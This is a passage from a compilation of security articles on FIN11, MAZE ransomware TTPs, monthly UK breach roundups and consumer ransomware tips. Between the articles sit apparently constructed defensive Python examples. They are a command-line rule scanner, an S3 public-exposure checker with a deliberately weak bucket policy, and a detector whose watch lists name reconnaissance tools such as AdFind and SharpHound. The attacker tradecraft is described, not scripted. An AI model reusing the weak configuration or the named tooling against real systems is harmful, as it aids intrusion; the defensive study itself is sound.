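    findings = []
    for idx, ev in enumerate(events):
        for rule_id, desc, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append({"event": idx, "host": ev["host"], "user": ev["user"],
                                 "rule": rule_id, "description": desc})
    return findings


def hosts_with_chain(findings, min_rules=2):
    """Hosts on which at least `min_rules` distinct rules fired.

    A single rule can be an admin one-off; the staging-plus-fan-out chain from the
    same pivot host is the higher-confidence signal worth paging on.
    """
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in by_host.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS)
    for f in found:
        print(f"event {f['event']} {f['host']} {f['user']}: {f['rule']} ({f['description']})")
    print("hosts showing the full chain:", hosts_with_chain(found))
```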

        FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

        Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

        In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

        Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in a few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—are part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

        Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

        To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 


        Cyber Security Roundup for October 2020

        A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, September 2020.

        COVID-19 wasn't the only virus seriously disrupting the start of the new UK academic year, with ransomware plaguing a number of universities and colleges in September. Newcastle University was reportedly hit by the 'DoppelPaymer' crime group, a group known for deploying malware to attack their victims, and behind leaking online documents from Elon Musk's SpaceX and Tesla companies. The northeast university reported a personal data breach to the UK Information Commissioner's Office after its stolen files were posted online, along with a Twitter threat to release further confidential student and staff data if a ransom payment was not paid. In a statement, the university said "it will take several weeks" to address the issues and that "many IT services will not be operating during this period"; that statement is the hallmark of recovery from a mass ransomware infection.

        Doppelpaymer Ransom notice

        On the back of the Newcastle University cyberattack, the UK National Cyber Security Centre (NCSC) issued a warning to all British universities and colleges about a spike in ransomware attacks targeting the British educational sector. NCSC's director of operations Paul Chichester said the agency had seen an increase in the "utterly reprehensible" attacks over the past 18 months and was concerned they would disrupt young people's education.  The NCSC's guidance for organisations on defending against ransomware attacks is available here.

        Across the pond, healthcare giant Universal Health Services (UHS), which operates nearly 400 hospitals and clinics, was said to be severely disrupted by the Ryuk ransomware. According to Bleeping Computer, a UHS employee said encrypted files had the telltale .ryk extension, while another employee described a ransom note that matched the Ryuk ransomware demand note. A Reddit thread claimed “All UHS hospitals nationwide in the US currently have no access to phones, computer systems, internet, or the data center. Ambulances are being rerouted to other hospitals, the information needed to treat patients – health records, lab works, cardiology reports, medications records, etc. – is either temporarily unavailable or received with delay, affecting patient treatment. Four people died tonight alone due to the waiting on results from the lab to see what was going on”. In response, UHS released a statement which said, “We implement extensive IT security protocols and are working diligently with our IT security partners to restore IT operations as quickly as possible. In the meantime, our facilities are using their established back-up processes including offline documentation methods".

        'Dark Overlord', the handle of a British hacker involved in the theft of information as part of "The Overlord" hacking group, was jailed for five years in the United States and ordered to pay $1.5 million in restitution, after pleading guilty to conspiring to commit aggravated identity theft and computer fraud, in other words, orchestrating cyber extortion attacks against US firms.


        ZeroLogon:  IT Support Staff must Patch Now!
        A critical Microsoft Windows Server Domain Controller vulnerability (CVE-2020-1472) is now causing concern for IT staff, after Microsoft, CISA, the UK NCSC, and other security bodies warned in mid-September that the vulnerability was being actively exploited. Dubbed 'Zerologon', the bug scored the maximum criticality rating of 10.0, and Microsoft issued a security fix for it as part of their August 2020 'Patch Tuesday' release of monthly security updates. Since the public disclosure of the flaw, multiple proof-of-concept (PoC) exploits have appeared on the internet, which threat actors are now adapting into their cyberattacks. There are no mitigations or workarounds for this vulnerability, so it is essential that the CVE-2020-1472 security update is installed on all Microsoft Windows Domain Controllers, and that DC enforcement mode is then enabled.

        Stay safe and secure.


              Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure

              Cybercriminals tend to keep with the times, as they often leverage current events as a way to harvest user data or spread malicious content. The McAfee COVID-19 Threat Report July 2020 points to a rather significant surge in attacks exploiting the current pandemic with COVID-19 themed malicious apps, phishing campaigns, malware, and ransomware. However, what many users don’t realize is that ransomware attacks are a lot more than meets the eye.

              COVID-19 Themed Ransomware

              During the first few months of 2020, the McAfee Advanced Threat Research (ATR) team saw that cybercriminals were targeting manufacturing, law, and construction businesses. After pinpointing their targets, hackers spread COVID-19 themed ransomware campaigns to these companies in an effort to capitalize on their relevancy during this time.

              An example of one of these attacks in action is Ransomware-GVZ. Ransomware-GVZ displays a ransom note demanding payment in return for decrypting the firm’s compromised systems and the personal and corporate data they contain. The ransomware then encrypts the organization’s files and displays a lock screen if a user attempts to reboot their device. As a result, the company is left with a severely crippled network while the criminals behind the attack gain a treasure trove of data – information belonging to consumers that have previously interacted with the business.   

               

              Ransomware Could Be the New Data Breach

              As ransomware attacks continue to evolve, it’s not just file encryption that users need to be aware of – they also need to be aware of the impact the attack has on compromised data. Senior Principal Engineer and Lead Scientist Christiaan Beek stated, “No longer can we call these attacks just ransomware incidents. When actors have access to the network and steal the data prior to encrypting it, threatening to leak if you don’t pay, that is a data [infraction].” If a ransomware attack exploits an organization and their network is compromised, so is the data on that network. Hackers can steal this data before encrypting it and use this stolen information to conduct identity theft or spread other misfortune that can affect both the organization’s employees and their customers.  

              This surge in ransomware is only compounded by traditional data infringements, which have also spiked in conjunction with the global pandemic. According to the McAfee COVID-19 Threat Report July 2020, the number of reported incidents targeting the public sector, individuals, education, and manufacturing dramatically increased. In fact, McAfee Labs counted 458 publicly disclosed security incidents in the first few months of 2020, with a 60% increase in attacks from Q4 2019 to Q1 2020 in the United States alone. Coincidentally, the attacks targeting organizations also impact the consumers who buy from them, as the company’s data consists of their customers’ personal and financial information.

              Don’t Let Your Data Be Taken for Ransom

              Because of the high volume of data that’s compromised by ransomware attacks, it’s crucial for consumers to shift how they approach these threats and respond in a similar way that they would a data incident. Luckily, there are actionable steps you can take as a consumer to help secure your data.

              Change your credentials

              If you discover that a data leak or a ransomware attack has compromised a company you’ve interacted with, err on the side of caution and change your passwords for all of your accounts. Taking extra precautions can help you avoid future attacks. 

              Take password protection seriously

              When updating your credentials, you should always ensure that your password is strong and unique. Many users utilize the same password or variations of it across all their accounts. Therefore, be sure to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials. 

              Enable two-factor or multi-factor authentication

              Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

              If you are targeted, never pay the ransom

              It’s possible that you could be targeted individually by a ransomware campaign. If this happens, don’t pay the ransom. Although you may feel that this is the only way to get your encrypted files back, there is no guarantee that the ransomware developers will send a decryption tool once they receive the payment. Paying the ransom also contributes to the development of more ransomware families, so it’s best to hold off on making any payments. 

              Use a comprehensive security solution

              Adding an extra layer of security with a solution such as McAfee® Total Protection, which includes Ransom Guard, can help protect your devices from these cyberthreats.  

              Stay Updated

              To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

              The post Ransomware Could Be the New Data Breach: 5 Tips to Stay Secure appeared first on McAfee Blogs.

              Book Review: Crime Dot Com, From Viruses to Vote Rigging, How Hacking Went Global

              I had the great delight of reading Geoff White’s new book, “Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global”, I thoroughly recommend it. The book is superbly researched and written, the author’s storytelling investigative journalist style not only lifts the lid on the murky underground world of cybercrime but shines a light on the ingenuity, persistence and ever-increasing global scale of sophisticated cybercriminal enterprises.
              Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global
              In Crime Dot Com Geoff takes the reader on a global historic tour of the shadowy cybercriminal underworld, from the humble beginnings with a rare interview with the elusive creator of the ‘Love Bug’ email worm, which caused havoc and panic back in 2000, right up to the modern-day alarming phenomenon of election hacking by nation-state actors.

              The book tells the tales of the most notorious hacks in recent history, explaining how they were successfully planned and orchestrated, all wonderfully written in a plain English style that my Luddite mother-in-law can understand. It reveals why cybercrime is not just about the Hollywood stereotypical lone hacker, eagerly tapping away on a keyboard in the dark finding ingenious ways of exploiting IT systems, but is really about online communities obscured from society, of like-minded individuals with questionable moral compasses, collaborating, and ultimately exploiting innocent people out of billions of pounds.

              The book covers the UK’s most notorious cyberattacks, such as the devastating 2017 WannaCry ransomware worm attack on the NHS, and the infamous TalkTalk hack carried out by teenage hackers. It delves beyond the media 'cyber scare' headlines of the time to bring the full story of what happened to the reader. The book also explores the rise and evolution of the Anonymous hacktivist culture and takes a deep dive into the less savoury aspects of criminal activities occurring on the dark web.

              As you read about the history of cybercrime in this book, a kind of symbiosis between cybercriminals’ and nation-state hackers’ activities becomes apparent, from Russian law enforcement turning a blind eye to Russian cybercriminals exploiting the West, to both the NSA’s and North Korea’s alleged involvement in creating the heinous WannaCry ransomware worm, and the UK cybercriminal that disabled that attack. The growing number of physical world impacts caused by cyber-attacks, so-called ‘kinetic warfare’, are also probed in Crime Dot Com: how sophisticated malware called Stuxnet, attributed by the media as United States military created, was unleashed with devastating effect to physically cripple an Iranian nuclear power station in a targeted attack, and why the latest cyber threat actors are targeting Britain’s energy network.

              While this book is an easily digestible read for non-cyber security experts, the book provides cybersecurity professionals working on the frontline in defending organisations and citizens against cyber-attacks, with valuable insights and lessons to be learnt about their cyber adversaries and their techniques, particularly in understanding the motivations behind today's common cyberattacks.
              5 out of 5: A must-read for anyone with an interest in cybercrime

              Cyber Security Roundup for August 2020

              A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, July 2020.

              The standout hack of July 2020, and possibly of the year, was the takeover of 45 celebrity Twitter accounts, in a bid to scam their millions of followers by requesting Bitcoin in tweets. 
              Twitter confirms internal tools used in bitcoin-promoting attack ...
              Scam Tweet
              The high-profile Twitter accounts compromised included Barack Obama, Elon Musk, Kanye West, Bill Gates, Jeff Bezos, Warren Buffett, Kim Kardashian, and Joe Biden. Around £80,000 of Bitcoin was sent to the scammer's Bitcoin account before Twitter swiftly took action by deleting the scam tweets and blocking every 'blue tick' verified Twitter user from tweeting, including me.

              While the Twitter hack and scam dominated media headlines around the world, the attack was not the 'highly sophisticated cyber-attack' reported by many media outlets, but it was certainly bold and clever. The attackers phoned Twitter administrative staff and blagged (socially engineered) their privileged Twitter account credentials out of them, which in turn gave the attackers access to Twitter's backend administrative system and to any Twitter account they desired. It is understood this Twitter account access was sold by a hacker on the dark web to a scammer in the days before the attack, and that the scammer(s) then orchestrated near-simultaneous Bitcoin scam tweets posted from the high-profile accounts. On 31st July, law enforcement authorities charged three men for the attack, with one of the suspects disclosed as a 19-year-old British man from Bognor Regis.

              There was a very serious critical Windows vulnerability disclosed as part of the July 2020 Microsoft 'Patch Tuesday' security update release. Dubbed "SIGRed", it is a 17-year-old Remote Code Execution (RCE) vulnerability in Windows Domain Name System (DNS), a component commonly present in Microsoft Windows Server 2008, 2012, 2012R2, 2016 and 2019. Disclosed as CVE-2020-1350, it was given the highest possible CVSS score of 10.0, which essentially means the vulnerability is "easy to attack" and "likely to be exploited", although Microsoft said it had not seen any evidence of exploitation at the time of the patch release.

              SIGRed is a wormable vulnerability, which makes it particularly dangerous: wormable malware could exploit it to spread itself rapidly over flat networks without any user interaction, as the WannaCry attack did on the NHS and other large organisations. Secondly, it could be used to compromise privileged accounts (i.e. admin accounts found on servers). CVE-2020-1350 can be mitigated on affected systems either by applying the Windows DNS Server patch Microsoft released (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350) or by applying a registry workaround (https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability).

              At least 10 universities in the UK had student data stolen after hackers attacked Blackbaud, an education-focused cloud service provider. UK universities impacted included York, Loughborough, Leeds, London, Reading, Exeter and Oxford. According to the BBC News website, Blackbaud said "In May of 2020, we discovered and stopped a ransomware attack. Prior to our locking the cyber-criminal out, the cyber-criminal removed a copy of a subset of data from our self-hosted environment."

              As expected, the UK Government ordered UK mobile network operators to remove all Huawei 5G equipment by 2027 and banned the purchase of Huawei 5G network equipment after 31st December 2020. Digital Secretary Oliver Dowden said it follows sanctions imposed by the United States, which claims the Chinese firm poses a national security threat, a claim Huawei continues to resolutely deny. The ban is expected to delay the UK's 5G rollout by a year. "This has not been an easy decision, but it is the right one for the UK telecoms networks, for our national security and our economy, both now and indeed in the long run," he said.
              In some media quarters it was suggested the UK U-turn on Huawei could lead to cyberattack repercussions, after Reuters said its sources confirmed China was behind cyberattacks on Australia's critical national infrastructure and government institutions following Australia's trade dispute with China.

              Russian hacking group APT 29 was jointly accused by the UK NCSC, the Canadian Communications Security Establishment (CSE), the United States Department of Homeland Security (DHS), the Cybersecurity and Infrastructure Security Agency (CISA) and the US National Security Agency (NSA) of targeting coronavirus vaccine research for theft. The UK's National Cyber Security Centre (NCSC) said the hackers "almost certainly" operated as "part of Russian intelligence services". It did not specify which research organisations had been targeted, or whether any coronavirus vaccine research data was taken, but it did say vaccine research was not hindered by the hackers. Russia's ambassador to the UK rejected the allegations: "I don't believe in this story at all, there is no sense in it," Andrei Kelin told the BBC's Andrew Marr Show. Foreign Secretary Dominic Raab said it is "very clear Russia did this", adding that it is important to call out this "pariah-type behaviour".

              UK sport said hackers tried to steal a £1 million club transfer fee and froze turnstiles at a football game. Cybercriminals hacked a Premier League club managing director's email account during a player transfer negotiation; the million-pound theft was only thwarted by a last-minute intervention by a bank. Another English football club was targeted by a ransomware attack which stopped its turnstiles and CCTV systems from working and nearly resulted in a football match being postponed. Common tactics used by hackers to attack football clubs include compromising email accounts, cyber-enabled fraud, and ransomware to shut down digital systems. For further information on this subject, see my extensive blog post on football club hacking, The Billion Pound Manchester City Hack.

              Smartwatch maker Garmin had its website, mobile app and customer service call centres taken down by ransomware on 23rd July 2020. Reports suggest the fitness brand was hit by the WastedLocker ransomware strain, said to have been developed by individuals linked to a Russia-based hacking group called 'Evil Corp'. According to Bleeping Computer, Garmin paid $10 million to the cybercriminals for the decryption keys on 24th or 25th July 2020.

              Yet another big data exposure caused by a misconfigured AWS S3 bucket was found by security researchers: one million files belonging to fitness brand 'V Shred' were discovered exposed to the world, including the personal data of 99,000 V Shred customers. Interestingly, V Shred pushed back on the researchers' findings, claiming it was necessary for user files to be publicly available and denying that any PII had been exposed.
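              The check a practitioner would want after reading about the V Shred exposure is whether a bucket's ACL grants or bucket policy are actually reachable by everyone. The following is an added example, not code from this roundup or from the researchers it cites: it classifies a bucket's effective exposure from documents shaped like the S3 GetBucketAcl, GetBucketPolicy and GetPublicAccessBlock responses, without calling AWS. All bucket names, IDs and documents below are constructed; the weak configuration is shown beside the corrected one, and the account-level Public Access Block settings are modelled as the control that neutralises public grants.

```python
"""Classify an S3 bucket's public exposure from its ACL, bucket policy and
Public Access Block settings, without calling AWS (constructed example)."""
import json
from typing import Any, Dict, List, Optional

PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anonymous)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}


def acl_public_grants(acl: Dict[str, Any]) -> List[str]:
    """Grants to the AllUsers / AuthenticatedUsers groups in a GetBucketAcl-shaped dict."""
    out = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI")
        if grantee.get("Type") == "Group" and uri in PUBLIC_GRANTEE_URIS:
            out.append(f"ACL grants {grant.get('Permission')} to {PUBLIC_GRANTEE_URIS[uri]}")
    return out


def _principal_is_everyone(principal: Any) -> bool:
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def policy_public_statements(policy_json: Optional[str]) -> List[str]:
    """Allow statements with a wildcard principal and no Condition in a bucket policy."""
    if not policy_json:
        return []
    out = []
    for st in json.loads(policy_json).get("Statement", []):
        if st.get("Effect") != "Allow" or not _principal_is_everyone(st.get("Principal")):
            continue
        if st.get("Condition"):
            continue  # a Condition may scope access (e.g. source IP); needs manual review
        actions = st.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        out.append(f"policy allows {', '.join(actions)} to everyone on {st.get('Resource')}")
    return out


def assess_bucket(acl: Dict[str, Any], policy_json: Optional[str],
                  public_access_block: Dict[str, bool]) -> Dict[str, Any]:
    """Effective exposure: ACL/policy grants that Public Access Block does not neutralise."""
    pab = public_access_block or {}
    acl_hits = acl_public_grants(acl)
    policy_hits = policy_public_statements(policy_json)
    exposures: List[str] = []
    suppressed: List[str] = []
    # IgnorePublicAcls makes public ACL grants inert; RestrictPublicBuckets does the
    # same for public bucket-policy statements.
    (suppressed if pab.get("IgnorePublicAcls") else exposures).extend(acl_hits)
    (suppressed if pab.get("RestrictPublicBuckets") else exposures).extend(policy_hits)
    return {"verdict": "public" if exposures else "private",
            "exposures": exposures, "suppressed": suppressed}


# Constructed documents: the weak configuration beside the corrected one.
OWNER = {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-CANONICAL-ID"}
WEAK_ACL = {"Grants": [
    {"Grantee": OWNER, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
WEAK_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-user-uploads/*"}]})
NO_PAB: Dict[str, bool] = {}

HARDENED_ACL = {"Grants": [{"Grantee": OWNER, "Permission": "FULL_CONTROL"}]}
HARDENED_POLICY = None  # public statement removed; serve user files via pre-signed URLs instead
FULL_PAB = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
            "BlockPublicPolicy": True, "RestrictPublicBuckets": True}

if __name__ == "__main__":
    print(assess_bucket(WEAK_ACL, WEAK_POLICY, NO_PAB))
    print(assess_bucket(HARDENED_ACL, HARDENED_POLICY, FULL_PAB))
```

              Statements carrying a Condition are deliberately left out of the public list rather than guessed at, since a source-IP or VPC condition can make a wildcard principal harmless; those need a human look.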


              Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents

              Targeted ransomware incidents have brought a threat of disruptive and destructive attacks to organizations across industries and geographies. FireEye Mandiant Threat Intelligence has previously documented this threat in our investigations of trends across ransomware incidents, FIN6 activity, implications for OT networks, and other aspects of post-compromise ransomware deployment. Since November 2019, we’ve seen the MAZE ransomware being used in attacks that combine targeted ransomware use, public exposure of victim data, and an affiliate model.

              Malicious actors have been actively deploying MAZE ransomware since at least May 2019. The ransomware was initially distributed via spam emails and exploit kits before later shifting to being deployed post-compromise. Multiple actors are involved in MAZE ransomware operations, based on our observations of alleged users in underground forums and distinct tactics, techniques, and procedures across Mandiant incident response engagements. Actors behind MAZE also maintain a public-facing website where they post data stolen from victims who refuse to pay an extortion fee.

              The combination of these two damaging intrusion outcomes—dumping sensitive data and disrupting enterprise networks—with a criminal service makes MAZE a notable threat to many organizations. This blog post is based on information derived from numerous Mandiant incident response engagements and our own research into the MAZE ecosystem and operations.

              Mandiant Threat Intelligence will be available to answer questions on the MAZE ransomware threat in a May 21 webinar.

              Victimology

              We are aware of more than 100 alleged MAZE victims reported by various media outlets and on the MAZE website since November 2019. These organizations have been primarily based in North America, although victims spanned nearly every geographical region. Nearly every industry sector, including manufacturing, legal, financial services, construction, healthcare, technology, retail, and government, has been impacted, demonstrating the indiscriminate nature of these operations (Figure 1).


              Figure 1: Geographical and industry distribution of alleged MAZE victims

              Multiple Actors Involved in MAZE Ransomware Operations Identified

              Mandiant identified multiple Russian-speaking actors who claimed to use MAZE ransomware and were seeking partners to fulfill different functional roles within their teams. Additional information on these actors is available to Mandiant Intelligence subscribers. A panel used to manage victims targeted for MAZE ransomware deployment has a section for affiliate transactions. This activity is consistent with our assessment that MAZE operates under an affiliate model and is not distributed by a single group. Under this business model, ransomware developers partner with other actors (i.e. affiliates) who are responsible for distributing the malware. In these scenarios, when a victim pays the ransom demand, the ransomware developers receive a commission. Direct affiliates of MAZE ransomware also partner with other actors who perform specific tasks for a percentage of the ransom payment. This includes partners who provide initial access to organizations and pentesters who are responsible for reconnaissance, privilege escalation and lateral movement—each of whom appears to work on a percentage basis. Notably, in some cases, actors may be hired on a salary basis (rather than commission) to perform specific tasks such as determining the victim organization and its annual revenues. This allows for specialization within the cyber criminal ecosystem, ultimately increasing efficiency, while still allowing all parties involved to profit.


              Figure 2: MAZE ransomware panel

              MAZE Initially Distributed via Exploit Kits and Spam Campaigns

              MAZE ransomware was initially distributed directly via exploit kits and spam campaigns through late 2019. For example, in November 2019, Mandiant observed multiple email campaigns delivering Maze ransomware primarily to individuals at organizations in Germany and the United States, although a significant number of emails were also delivered to entities in Canada, Italy, and South Korea. These emails used tax, invoice, and package delivery themes with document attachments or inline links to documents which download and execute Maze ransomware.

              On November 6 and 7, a Maze campaign targeting Germany delivered macro-laden documents using the subject lines “Wichtige informationen uber Steuerruckerstattung” and “1&1 Internet AG - Ihre Rechnung 19340003422 vom 07.11.19” (Figure 3). Recipients included individuals at organizations in a wide range of industries, with the Financial Services, Healthcare, and Manufacturing sectors being targeted most frequently. These emails were sent using a number of malicious domains created with the registrant address gladkoff1991@yandex.ru.


              Figure 3: German-language lure

              On November 8, a campaign delivered Maze primarily to Financial Services and Insurance organizations located in the United States. These emails originated from a compromised or spoofed account and contained an inline link to download a Maze executable payload.

              On November 18 and 19, a Maze campaign targeted individuals operating in a range of industries in the United States and Canada with macro documents using phone bill and package delivery themes (Figure 4 and Figure 5). These emails used the subjects “Missed package delivery” and "Your AT&T wireless bill is ready to view" and were sent using a number of malicious domains with the registrant address abusereceive@hitler.rocks. Notably, this registrant address was also used to create multiple Italian-language domains towards the end of November 2019.


              Figure 4: AT&T email lure


              Figure 5: Canada Post email lure

              Shift to Post-Compromise Distribution Maximizes Impact

              Actors using MAZE have increasingly shifted to deploying the ransomware post-compromise. This methodology provides an opportunity to infect more hosts within a victim’s environment and exfiltrate data, which is leveraged to apply additional pressure on organizations to pay extortion fees. Notably, in at least some cases, the actors behind these operations charge an additional fee, in addition to the decryption key, for the non-release of stolen data.

              Although the high-level intrusion scenarios preceding the distribution of MAZE ransomware are broadly similar, there have been notable variations across intrusions that suggest attribution to distinct teams. Even within these teams, the cyber criminals appear to be task-oriented, meaning that one operator is not responsible for the full lifecycle. The following sections highlight the TTPs seen in a subset of incidents and serve to illustrate the divergence that may occur because numerous, disparate actors are involved in different phases of these operations. Notably, the time between initial compromise and encryption has also varied widely, from weeks to many months.

              Initial Compromise

              There are few clear patterns for intrusion vector across analyzed MAZE ransomware incidents. This is consistent with our observations of multiple actors who use MAZE soliciting partners with network access. The following are a sample of observations from several Mandiant incident response engagements:

              • A user downloaded a malicious resume-themed Microsoft Word document that contained macros which launched an IcedID payload, which was ultimately used to execute an instance of BEACON.
              • An actor logged into an internet-facing system via RDP. The account used to grant initial access was a generic support account. It is unclear how the actor obtained the account's password.
              • An actor exploited a misconfiguration on an Internet-facing system. This access enabled the actor to deploy tools to pivot into the internal network.
              • An actor logged into a Citrix web portal account with a weak password. This authenticated access enabled the actor to launch a Meterpreter payload on an internal system.

              Establish Foothold & Maintain Presence

              The use of legitimate credentials and broad distribution of BEACON across victim environments appear to be consistent approaches used by actors to establish their foothold in victim networks and to maintain presence as they look to meet their ultimate objective of deploying MAZE ransomware. Despite these commonplace behaviors, we have observed an actor create their own domain account to enable later-stage operations.

              • Across multiple incidents, threat actors deploying MAZE established a foothold in victim environments by installing BEACON payloads on many servers and workstations.
              • Web shells were deployed to an internet-facing system. The system level access granted by these web shells was used to enable initial privilege escalation and the execution of a backdoor.
              • Intrusion operators regularly obtained and maintained access to multiple domain and local system accounts with varying permissions that were used throughout their operations.
              • An actor created a new domain account and added it to the domain administrators group.

              Escalate Privileges

              Although Mandiant has observed multiple cases where MAZE intrusion operators employed Mimikatz to collect credentials to enable privilege escalation, these efforts have also been bolstered in multiple cases by the use of Bloodhound and by more manual searches for files containing credentials.

              • Less than two weeks after initial access, the actor downloaded and interacted with an archive named mimi.zip, which contained files corresponding to the credential harvesting tool Mimikatz. In the following days the same mimi.zip archive was identified on two domain controllers in the impacted environment.
              • The actor attempted to find files with the word “password” within the environment. Additionally, several archive files were also created with file names suggestive of credential harvesting activity.
              • The actor attempted to identify hosts running the KeePass password safe software.
              • Across multiple incidents, the Bloodhound utility was used, presumably to assess possible methods of obtaining credentials with domain administrator privileges.
              • Actors primarily used Procdump and Mimikatz to collect credentials used to enable later stages of their intrusion. Notably, both Bloodhound and PingCastle were also used, presumably to enable attackers' efforts to understand the impacted organization's Active Directory configuration. In this case the responsible actors also attempted to exfiltrate collected credentials to multiple different cloud file storage services.

              Reconnaissance

              Mandiant has observed a broad range of approaches to network, host, data, and Active Directory reconnaissance across observed MAZE incidents. The varied tools and approaches across these incidents perhaps best highlight the divergent ways in which the responsible actors interact with victim networks.

              • In some intrusions, reconnaissance activity occurred within three days of gaining initial access to the victim network. The responsible actor executed a large number of reconnaissance scripts via Cobalt Strike to collect network, host, filesystem, and domain related information.
              • Multiple built-in Windows commands were used to enable network, account, and host reconnaissance of the impacted environment, though the actors also supplied and used Advanced IP Scanner and Adfind to support this stage of their operations.
              • Preliminary network reconnaissance was conducted using a batch script named '2.bat' which contained a series of nslookup commands. The output of this script was copied into a file named '2.txt'.
              • The actor exfiltrated reconnaissance command output data and documents related to the IT environment to an attacker-controlled FTP server via an encoded PowerShell script.
              • Over a period of several days, an actor conducted reconnaissance activity using Bloodhound, PowerSploit/PowerView (Invoke-ShareFinder), and a reconnaissance script designed to enumerate directories across internal hosts.
              • An actor employed the adfind tool and a batch script to collect information about the victim's network, hosts, domain, and users. The output from this batch script (2adfind.bat) was saved into an archive named 'ad.7z' using an instance of the 7zip archiving utility named 7.exe.
              • An actor used the tool smbtools.exe to assess whether accounts could log in to systems across the environment.
              • An actor collected directory listings from file servers across an impacted environment. Evidence of data exfiltration was observed approximately one month later, suggesting that the creation of these directory listings may have been precursor activity, providing the actors with data they may have used to identify sensitive data for future exfiltration.
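              The reconnaissance bullets above describe three things a defender can look for in process-creation telemetry: a renamed archiver (7.exe whose PE resource still says 7z.exe), direct use of Active Directory query tooling such as adfind, and a burst of nslookup calls driven by a batch script like '2.bat'. The following is an added example, not code from the Mandiant post, that applies those three checks to Sysmon Event ID 1-style records. The event fields, tool names, OriginalFileName values and every sample event are constructed assumptions, not observations from any incident.

```python
"""Spot reconnaissance tooling in process-creation telemetry (constructed example).

Three checks: (a) a watch-listed tool renamed on disk, caught by comparing the PE
OriginalFileName with the executed image name; (b) direct execution of known AD /
network recon tools; (c) a burst of nslookup processes spawned from cmd.exe."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List

# Tools whose presence on a workstation is worth a look (names are assumptions).
RECON_TOOLS: Dict[str, str] = {
    "adfind.exe": "AdFind (Active Directory query tool)",
    "sharphound.exe": "SharpHound (BloodHound ingestor)",
    "advanced_ip_scanner.exe": "Advanced IP Scanner",
}
# Tools that are only suspicious when renamed: 7-Zip is common, "7.exe" is not.
RENAME_WATCHLIST: Dict[str, str] = {"7z.exe": "7-Zip", **RECON_TOOLS}

NSLOOKUP_BURST_THRESHOLD = 10


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    image: str           # full path of the executed binary
    original_name: str   # OriginalFileName from the PE version resource ("" if absent)
    parent_image: str    # full path of the parent process
    cmdline: str


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_tooling(events: List[ProcessEvent]) -> List[Finding]:
    findings = []
    for ev in events:
        img = basename(ev.image)
        orig = ev.original_name.lower()
        if orig in RENAME_WATCHLIST and orig != img:
            findings.append(Finding(ev.host, "renamed_tool",
                                    f"{RENAME_WATCHLIST[orig]} running as {img}: {ev.cmdline}"))
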